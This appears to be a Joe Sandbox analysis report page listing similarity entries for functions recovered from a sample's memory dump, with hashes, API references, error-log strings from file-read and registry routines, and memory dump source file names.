API ID: fclose
String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
API String ID: 3125558077-1073242539
Opcode ID: bc7aacda62b4ea1fd89abae9408600b20ec1f693edfd2ccf07a2e231a536cb80
Instruction ID: 4295d770f716c68aa56fcb040638fa6a4903ad00b568e54ce1404830b31cd558
Opcode Fuzzy Hash: bc7aacda62b4ea1fd89abae9408600b20ec1f693edfd2ccf07a2e231a536cb80
Instruction Fuzzy Hash: 3EF05E73B0964281FB52FF14B440BBD96422F45376EC90633CD494B6D1AEBDA8869320

Function 00007FF7C1AB557B Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON

Download Yara Rule

APIs

fclose.MSVCRT ref: 00007FF7C1AB5520

Strings

fs_file_read, xrefs: 00007FF7C1AB5555
[E] (%s) -> Failed(path=%s,err=%08x), xrefs: 00007FF7C1AB555C

Memory Dump Source

Source File: 00000017.00000002.2669011856.00007FF7C1AB1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7C1AB0000, based on PE: true

Associated: 00000017.00000002.2668984253.00007FF7C1AB0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669040522.00007FF7C1AC0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669059079.00007FF7C1AC8000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669059079.00007FF7C1ACA000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669129949.00007FF7C1ACE000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ff7c1ab0000_main.jbxd

Similarity

API ID: fclose
String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
API String ID: 3125558077-1073242539
Opcode ID: 798608696c1efb0cf9ba72299e9e92e89b77a2b24a8315aba785b2605ef729da
Instruction ID: cd7d381701052e1edbffe1bdf16d591c7619c7face9e15d32fba0f0dff6490c7
Opcode Fuzzy Hash: 798608696c1efb0cf9ba72299e9e92e89b77a2b24a8315aba785b2605ef729da
Instruction Fuzzy Hash: 67F0BE73B0814281FB53FF14B400BBC92421F41376EC906338D090B6C1AEBDA8829320

Function 00007FF7C1AB5175 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON

Download Yara Rule

APIs

fclose.MSVCRT ref: 00007FF7C1AB5520

Strings

fs_file_read, xrefs: 00007FF7C1AB5555
[E] (%s) -> Failed(path=%s,err=%08x), xrefs: 00007FF7C1AB555C

Memory Dump Source

Source File: 00000017.00000002.2669011856.00007FF7C1AB1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7C1AB0000, based on PE: true

Associated: 00000017.00000002.2668984253.00007FF7C1AB0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669040522.00007FF7C1AC0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669059079.00007FF7C1AC8000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669059079.00007FF7C1ACA000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669129949.00007FF7C1ACE000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ff7c1ab0000_main.jbxd

Similarity

API ID: fclose
String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
API String ID: 3125558077-1073242539
Opcode ID: 531eddd04ba4df6279567b12e9b44042d35f737912b58bd659f53787c1cb0e98
Instruction ID: 3b8a6eea542fb34637ba83395c3bfe2693cefb54c7e0e495c7ad69bcb0cbdf93
Opcode Fuzzy Hash: 531eddd04ba4df6279567b12e9b44042d35f737912b58bd659f53787c1cb0e98
Instruction Fuzzy Hash: 1CF05E73B0964281FB52FF14B440BBD96421F45376EC90633CD494B6D1AEBDA8869320

Function 00007FF7C1AB516B Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON

Download Yara Rule

APIs

fclose.MSVCRT ref: 00007FF7C1AB5520

Strings

fs_file_read, xrefs: 00007FF7C1AB5555
[E] (%s) -> Failed(path=%s,err=%08x), xrefs: 00007FF7C1AB555C

Memory Dump Source

Source File: 00000017.00000002.2669011856.00007FF7C1AB1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7C1AB0000, based on PE: true

Associated: 00000017.00000002.2668984253.00007FF7C1AB0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669040522.00007FF7C1AC0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669059079.00007FF7C1AC8000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669059079.00007FF7C1ACA000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669129949.00007FF7C1ACE000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ff7c1ab0000_main.jbxd

Similarity

API ID: fclose
String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
API String ID: 3125558077-1073242539
Opcode ID: 9d2de69efe56b1c99ae78d64d1b609328d2722557249e32473173a1159c819cd
Instruction ID: 4f32e111606aa669f2e2081493924a6fb41a9fc20d9554670fb8ebc1df17f07d
Opcode Fuzzy Hash: 9d2de69efe56b1c99ae78d64d1b609328d2722557249e32473173a1159c819cd
Instruction Fuzzy Hash: 81F05E73B0964281FB52FF14B440BBD96421F45376EC90633CD494B6D1AEBDA8869320

Function 00007FF7C1AB5161 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON

Download Yara Rule

APIs

fclose.MSVCRT ref: 00007FF7C1AB5520

Strings

fs_file_read, xrefs: 00007FF7C1AB5555
[E] (%s) -> Failed(path=%s,err=%08x), xrefs: 00007FF7C1AB555C

Memory Dump Source

Source File: 00000017.00000002.2669011856.00007FF7C1AB1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7C1AB0000, based on PE: true

Associated: 00000017.00000002.2668984253.00007FF7C1AB0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669040522.00007FF7C1AC0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669059079.00007FF7C1AC8000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669059079.00007FF7C1ACA000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669129949.00007FF7C1ACE000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ff7c1ab0000_main.jbxd

Similarity

API ID: fclose
String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
API String ID: 3125558077-1073242539
Opcode ID: d9bc328c2e7b63bb156a7e01eb61a8a2b8ead1ee2ea913901e2332856c61f7bd
Instruction ID: 4f92e826c88e93e41a2c67fa124d3c7b9877c9c340c0a30761b7323073741610
Opcode Fuzzy Hash: d9bc328c2e7b63bb156a7e01eb61a8a2b8ead1ee2ea913901e2332856c61f7bd
Instruction Fuzzy Hash: 1EF05E73B0964281FB52FF14B441BBD96421F45376EC90633CD494B6D1AEBDA8869320

Function 00007FF7C1AB5157 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON

Download Yara Rule

APIs

fclose.MSVCRT ref: 00007FF7C1AB5520

Strings

fs_file_read, xrefs: 00007FF7C1AB5555
[E] (%s) -> Failed(path=%s,err=%08x), xrefs: 00007FF7C1AB555C

Memory Dump Source

Source File: 00000017.00000002.2669011856.00007FF7C1AB1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7C1AB0000, based on PE: true

Associated: 00000017.00000002.2668984253.00007FF7C1AB0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669040522.00007FF7C1AC0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669059079.00007FF7C1AC8000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669059079.00007FF7C1ACA000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669129949.00007FF7C1ACE000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ff7c1ab0000_main.jbxd

Similarity

API ID: fclose
String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
API String ID: 3125558077-1073242539
Opcode ID: 00b0b1ba4e8dbb86f78792e9a63b8dad70a0698bfb00e83aba3b21c0b858e065
Instruction ID: 0ba2e7c2a368dc47192e30272ed9ef75a11c50f5095c716f2e1eab9ddf7ac83d
Opcode Fuzzy Hash: 00b0b1ba4e8dbb86f78792e9a63b8dad70a0698bfb00e83aba3b21c0b858e065
Instruction Fuzzy Hash: 27F05E73B0964681FB52FF14B450BBD96421F45376EC90633CD494B6D1AEBDA8869320

Function 00007FF7C1AB550C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON

Download Yara Rule

APIs

fclose.MSVCRT ref: 00007FF7C1AB5520

Strings

fs_file_read, xrefs: 00007FF7C1AB5555
[E] (%s) -> Failed(path=%s,err=%08x), xrefs: 00007FF7C1AB555C

Memory Dump Source

Source File: 00000017.00000002.2669011856.00007FF7C1AB1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7C1AB0000, based on PE: true

Associated: 00000017.00000002.2668984253.00007FF7C1AB0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669040522.00007FF7C1AC0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669059079.00007FF7C1AC8000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669059079.00007FF7C1ACA000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669129949.00007FF7C1ACE000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ff7c1ab0000_main.jbxd

Similarity

API ID: fclose
String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
API String ID: 3125558077-1073242539
Opcode ID: f95281721a7e5c1ee605338d872ec6cfe1eade8d45f316916e8674f06dc55b20
Instruction ID: ba8dd72a310232102464afaf126d0ceab20cf42f948dfa583aa804a504191567
Opcode Fuzzy Hash: f95281721a7e5c1ee605338d872ec6cfe1eade8d45f316916e8674f06dc55b20
Instruction Fuzzy Hash: 4CF0BE73B0824281FB53FF14B400BBC92421F41376EC90633CD090B6C1AEBDA8828320

Function 00007FF7C1AB5505 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON

Download Yara Rule

APIs

fclose.MSVCRT ref: 00007FF7C1AB5520

Strings

fs_file_read, xrefs: 00007FF7C1AB5555
[E] (%s) -> Failed(path=%s,err=%08x), xrefs: 00007FF7C1AB555C

Memory Dump Source

Source File: 00000017.00000002.2669011856.00007FF7C1AB1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7C1AB0000, based on PE: true

Associated: 00000017.00000002.2668984253.00007FF7C1AB0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669040522.00007FF7C1AC0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669059079.00007FF7C1AC8000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669059079.00007FF7C1ACA000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669129949.00007FF7C1ACE000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ff7c1ab0000_main.jbxd

Similarity

API ID: fclose
String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
API String ID: 3125558077-1073242539
Opcode ID: f95281721a7e5c1ee605338d872ec6cfe1eade8d45f316916e8674f06dc55b20
Instruction ID: ba8dd72a310232102464afaf126d0ceab20cf42f948dfa583aa804a504191567
Opcode Fuzzy Hash: f95281721a7e5c1ee605338d872ec6cfe1eade8d45f316916e8674f06dc55b20
Instruction Fuzzy Hash: 4CF0BE73B0824281FB53FF14B400BBC92421F41376EC90633CD090B6C1AEBDA8828320

Function 00007FF7C1AB54FE Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON

Download Yara Rule

APIs

fclose.MSVCRT ref: 00007FF7C1AB5520

Strings

fs_file_read, xrefs: 00007FF7C1AB5555
[E] (%s) -> Failed(path=%s,err=%08x), xrefs: 00007FF7C1AB555C

Memory Dump Source

Source File: 00000017.00000002.2669011856.00007FF7C1AB1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7C1AB0000, based on PE: true

Associated: 00000017.00000002.2668984253.00007FF7C1AB0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669040522.00007FF7C1AC0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669059079.00007FF7C1AC8000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669059079.00007FF7C1ACA000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669129949.00007FF7C1ACE000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ff7c1ab0000_main.jbxd

Similarity

API ID: fclose
String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
API String ID: 3125558077-1073242539
Opcode ID: f95281721a7e5c1ee605338d872ec6cfe1eade8d45f316916e8674f06dc55b20
Instruction ID: ba8dd72a310232102464afaf126d0ceab20cf42f948dfa583aa804a504191567
Opcode Fuzzy Hash: f95281721a7e5c1ee605338d872ec6cfe1eade8d45f316916e8674f06dc55b20
Instruction Fuzzy Hash: 4CF0BE73B0824281FB53FF14B400BBC92421F41376EC90633CD090B6C1AEBDA8828320

Function 00007FF7C1AB5396 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON

Download Yara Rule

APIs

fclose.MSVCRT ref: 00007FF7C1AB5520

Strings

fs_file_read, xrefs: 00007FF7C1AB5555
[E] (%s) -> Failed(path=%s,err=%08x), xrefs: 00007FF7C1AB555C

Memory Dump Source

Source File: 00000017.00000002.2669011856.00007FF7C1AB1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7C1AB0000, based on PE: true

Associated: 00000017.00000002.2668984253.00007FF7C1AB0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669040522.00007FF7C1AC0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669059079.00007FF7C1AC8000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669059079.00007FF7C1ACA000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669129949.00007FF7C1ACE000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ff7c1ab0000_main.jbxd

Similarity

API ID: fclose
String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
API String ID: 3125558077-1073242539
Opcode ID: 531eddd04ba4df6279567b12e9b44042d35f737912b58bd659f53787c1cb0e98
Instruction ID: 3b8a6eea542fb34637ba83395c3bfe2693cefb54c7e0e495c7ad69bcb0cbdf93
Opcode Fuzzy Hash: 531eddd04ba4df6279567b12e9b44042d35f737912b58bd659f53787c1cb0e98
Instruction Fuzzy Hash: 1CF05E73B0964281FB52FF14B440BBD96421F45376EC90633CD494B6D1AEBDA8869320

Function 00007FF7C1AB538C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON

Download Yara Rule

APIs

fclose.MSVCRT ref: 00007FF7C1AB5520

Strings

fs_file_read, xrefs: 00007FF7C1AB5555
[E] (%s) -> Failed(path=%s,err=%08x), xrefs: 00007FF7C1AB555C

Memory Dump Source

Source File: 00000017.00000002.2669011856.00007FF7C1AB1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7C1AB0000, based on PE: true

Associated: 00000017.00000002.2668984253.00007FF7C1AB0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669040522.00007FF7C1AC0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669059079.00007FF7C1AC8000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669059079.00007FF7C1ACA000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669129949.00007FF7C1ACE000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ff7c1ab0000_main.jbxd

Similarity

API ID: fclose
String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
API String ID: 3125558077-1073242539
Opcode ID: 9d2de69efe56b1c99ae78d64d1b609328d2722557249e32473173a1159c819cd
Instruction ID: 4f32e111606aa669f2e2081493924a6fb41a9fc20d9554670fb8ebc1df17f07d
Opcode Fuzzy Hash: 9d2de69efe56b1c99ae78d64d1b609328d2722557249e32473173a1159c819cd
Instruction Fuzzy Hash: 81F05E73B0964281FB52FF14B440BBD96421F45376EC90633CD494B6D1AEBDA8869320

Function 00007FF7C1AB5382 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON

Download Yara Rule

APIs

fclose.MSVCRT ref: 00007FF7C1AB5520

Strings

fs_file_read, xrefs: 00007FF7C1AB5555
[E] (%s) -> Failed(path=%s,err=%08x), xrefs: 00007FF7C1AB555C

Memory Dump Source

Source File: 00000017.00000002.2669011856.00007FF7C1AB1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7C1AB0000, based on PE: true

Associated: 00000017.00000002.2668984253.00007FF7C1AB0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669040522.00007FF7C1AC0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669059079.00007FF7C1AC8000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669059079.00007FF7C1ACA000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669129949.00007FF7C1ACE000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ff7c1ab0000_main.jbxd

Similarity

API ID: fclose
String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
API String ID: 3125558077-1073242539
Opcode ID: d9bc328c2e7b63bb156a7e01eb61a8a2b8ead1ee2ea913901e2332856c61f7bd
Instruction ID: 4f92e826c88e93e41a2c67fa124d3c7b9877c9c340c0a30761b7323073741610
Opcode Fuzzy Hash: d9bc328c2e7b63bb156a7e01eb61a8a2b8ead1ee2ea913901e2332856c61f7bd
Instruction Fuzzy Hash: 1EF05E73B0964281FB52FF14B441BBD96421F45376EC90633CD494B6D1AEBDA8869320

Function 00007FF7C1AB5378 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON

Download Yara Rule

APIs

fclose.MSVCRT ref: 00007FF7C1AB5520

Strings

fs_file_read, xrefs: 00007FF7C1AB5555
[E] (%s) -> Failed(path=%s,err=%08x), xrefs: 00007FF7C1AB555C

Memory Dump Source

Source File: 00000017.00000002.2669011856.00007FF7C1AB1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7C1AB0000, based on PE: true

Associated: 00000017.00000002.2668984253.00007FF7C1AB0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669040522.00007FF7C1AC0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669059079.00007FF7C1AC8000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669059079.00007FF7C1ACA000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669129949.00007FF7C1ACE000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ff7c1ab0000_main.jbxd

Similarity

API ID: fclose
String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
API String ID: 3125558077-1073242539
Opcode ID: 00b0b1ba4e8dbb86f78792e9a63b8dad70a0698bfb00e83aba3b21c0b858e065
Instruction ID: 0ba2e7c2a368dc47192e30272ed9ef75a11c50f5095c716f2e1eab9ddf7ac83d
Opcode Fuzzy Hash: 00b0b1ba4e8dbb86f78792e9a63b8dad70a0698bfb00e83aba3b21c0b858e065
Instruction Fuzzy Hash: 27F05E73B0964681FB52FF14B450BBD96421F45376EC90633CD494B6D1AEBDA8869320

Function 00007FF7C1AB536E Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON

Download Yara Rule

APIs

fclose.MSVCRT ref: 00007FF7C1AB5520

Strings

fs_file_read, xrefs: 00007FF7C1AB5555
[E] (%s) -> Failed(path=%s,err=%08x), xrefs: 00007FF7C1AB555C

Memory Dump Source

Source File: 00000017.00000002.2669011856.00007FF7C1AB1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7C1AB0000, based on PE: true

Associated: 00000017.00000002.2668984253.00007FF7C1AB0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669040522.00007FF7C1AC0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669059079.00007FF7C1AC8000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669059079.00007FF7C1ACA000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669129949.00007FF7C1ACE000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ff7c1ab0000_main.jbxd

Similarity

API ID: fclose
String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
API String ID: 3125558077-1073242539
Opcode ID: bc7aacda62b4ea1fd89abae9408600b20ec1f693edfd2ccf07a2e231a536cb80
Instruction ID: 4295d770f716c68aa56fcb040638fa6a4903ad00b568e54ce1404830b31cd558
Opcode Fuzzy Hash: bc7aacda62b4ea1fd89abae9408600b20ec1f693edfd2ccf07a2e231a536cb80
Instruction Fuzzy Hash: 3EF05E73B0964281FB52FF14B440BBD96422F45376EC90633CD494B6D1AEBDA8869320

Function 00007FF7C1AB9578 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 33registryCOMMON

Download Yara Rule

APIs

RegCloseKey.KERNEL32 ref: 00007FF7C1AB950D

Part of subcall function 00007FF7C1AB2EF2: fwrite.MSVCRT ref: 00007FF7C1AB2F9E
Part of subcall function 00007FF7C1AB2EF2: fflush.MSVCRT ref: 00007FF7C1AB2FAA

Strings

registry_get_value, xrefs: 00007FF7C1AB9556
[E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x), xrefs: 00007FF7C1AB955D

Memory Dump Source

Source File: 00000017.00000002.2669011856.00007FF7C1AB1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7C1AB0000, based on PE: true

Associated: 00000017.00000002.2668984253.00007FF7C1AB0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669040522.00007FF7C1AC0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669059079.00007FF7C1AC8000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669059079.00007FF7C1ACA000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669129949.00007FF7C1ACE000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ff7c1ab0000_main.jbxd

Similarity

API ID: Closefflushfwrite
String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
API String ID: 1001908780-1680961811
Opcode ID: 2184f698f340724257a868853157a846e45dfc9da2f3f3d0255bb2872cf3deb8
Instruction ID: 325d748c2a04b9a70f2382249f26dbed23b2114b4811cfd46052b8d950efb7eb
Opcode Fuzzy Hash: 2184f698f340724257a868853157a846e45dfc9da2f3f3d0255bb2872cf3deb8
Instruction Fuzzy Hash: D6F0C2B260878641E752EF00B850BBDA254BF407B4F884237ED5D47790EFADD989D314

Function 00007FF7C1AB94FC Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 33registryCOMMON

Download Yara Rule

APIs

RegCloseKey.KERNEL32 ref: 00007FF7C1AB950D

Part of subcall function 00007FF7C1AB2EF2: fwrite.MSVCRT ref: 00007FF7C1AB2F9E
Part of subcall function 00007FF7C1AB2EF2: fflush.MSVCRT ref: 00007FF7C1AB2FAA

Strings

registry_get_value, xrefs: 00007FF7C1AB9556
[E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x), xrefs: 00007FF7C1AB955D

Memory Dump Source

Source File: 00000017.00000002.2669011856.00007FF7C1AB1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7C1AB0000, based on PE: true

Associated: 00000017.00000002.2668984253.00007FF7C1AB0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669040522.00007FF7C1AC0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669059079.00007FF7C1AC8000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669059079.00007FF7C1ACA000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669129949.00007FF7C1ACE000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ff7c1ab0000_main.jbxd

Similarity

API ID: Closefflushfwrite
String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
API String ID: 1001908780-1680961811
Opcode ID: da678776d0bd37551f754dc791598b4711e195c8fdbadf124998fd8a1f822327
Instruction ID: a1ec4a3a4010167efafa76bc38d4a63e2ae70f7c26eca77090fe353d7465682e
Opcode Fuzzy Hash: da678776d0bd37551f754dc791598b4711e195c8fdbadf124998fd8a1f822327
Instruction Fuzzy Hash: CEF0C2B260878642E752EF00B850BBDA654AF407B4F880237ED1D4B790EFADD989D314

Function 00007FF7C1AB94EE Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 33registryCOMMON

Download Yara Rule

APIs

RegCloseKey.KERNEL32 ref: 00007FF7C1AB950D

Part of subcall function 00007FF7C1AB2EF2: fwrite.MSVCRT ref: 00007FF7C1AB2F9E
Part of subcall function 00007FF7C1AB2EF2: fflush.MSVCRT ref: 00007FF7C1AB2FAA

Strings

registry_get_value, xrefs: 00007FF7C1AB9556
[E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x), xrefs: 00007FF7C1AB955D

Memory Dump Source

Source File: 00000017.00000002.2669011856.00007FF7C1AB1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7C1AB0000, based on PE: true

Associated: 00000017.00000002.2668984253.00007FF7C1AB0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669040522.00007FF7C1AC0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669059079.00007FF7C1AC8000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669059079.00007FF7C1ACA000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669129949.00007FF7C1ACE000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ff7c1ab0000_main.jbxd

Similarity

API ID: Closefflushfwrite
String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
API String ID: 1001908780-1680961811
Opcode ID: 724834400780d6935085e559911a7bd4e5cf6f6d5c5b92713232e329f0929a47
Instruction ID: cd722ace68ff9a3f43e0d4812bbc5fa3c8a246af3d7af8f78eff81c1a3d9e594
Opcode Fuzzy Hash: 724834400780d6935085e559911a7bd4e5cf6f6d5c5b92713232e329f0929a47
Instruction Fuzzy Hash: 32F0C2B260878641E752EF00B850BBDA658AF407B4F880237ED1D4B790EFADD989D314

Function 00007FF7C1AB9467 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 33registryCOMMON

Download Yara Rule

APIs

RegCloseKey.KERNEL32 ref: 00007FF7C1AB950D

Part of subcall function 00007FF7C1AB2EF2: fwrite.MSVCRT ref: 00007FF7C1AB2F9E
Part of subcall function 00007FF7C1AB2EF2: fflush.MSVCRT ref: 00007FF7C1AB2FAA

Strings

registry_get_value, xrefs: 00007FF7C1AB9556
[E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x), xrefs: 00007FF7C1AB955D

Memory Dump Source

Source File: 00000017.00000002.2669011856.00007FF7C1AB1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7C1AB0000, based on PE: true

Associated: 00000017.00000002.2668984253.00007FF7C1AB0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669040522.00007FF7C1AC0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669059079.00007FF7C1AC8000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669059079.00007FF7C1ACA000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669129949.00007FF7C1ACE000.00000002.00000001.01000000.00000008.sdmpDownload File

